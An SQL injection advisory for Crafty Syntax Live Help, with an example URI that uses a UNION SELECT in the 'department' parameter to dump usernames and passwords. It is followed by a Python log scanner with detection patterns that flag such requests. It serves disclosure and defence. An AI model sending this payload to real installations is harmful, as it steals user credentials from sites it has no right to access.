Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat(username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/*
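
A detection sketch for the request shown above, added here as an example and not part of the original advisory: it scans web-server access logs for is_xmlhttp.php requests whose department value is not a plain integer. The combined log format, the treatment of department as a numeric ID, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: `department` is a numeric ID, so any other value is suspect.
NUMERIC_ID = re.compile(r"\d+")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that separate probable SQL injection from merely malformed input.
SQL_HINT = re.compile(r"\b(?:union|select|concat|from)\b|/\*|--", re.I)

def check_line(line):
    """Return (value, reason) for a suspicious is_xmlhttp.php request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/is_xmlhttp.php"):
        return None
    # parse_qs percent-decodes, so "%20UNION%20" is inspected as " UNION ".
    for value in parse_qs(url.query).get("department", []):
        if NUMERIC_ID.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_HINT.search(value) else "non-numeric"
        return value, reason
    return None

def scan(lines):
    """Return (line_number, client_ip, reason) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = check_line(line)
        if result:
            hits.append((number, line.split(" ", 1)[0], result[1]))
    return hits

# Constructed sample log lines (documentation IP ranges); line 2 is the advisory's URI.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /is_xmlhttp.php?scriptname=1&department=3 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat(username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/* HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2010:10:00:09 +0000] "GET /is_xmlhttp.php?scriptname=1&department=sales HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?department=x HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, applied server-side before the value reaches the query, rejects the request outright rather than only logging it.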


 

Copyright 2010, SecurityFocus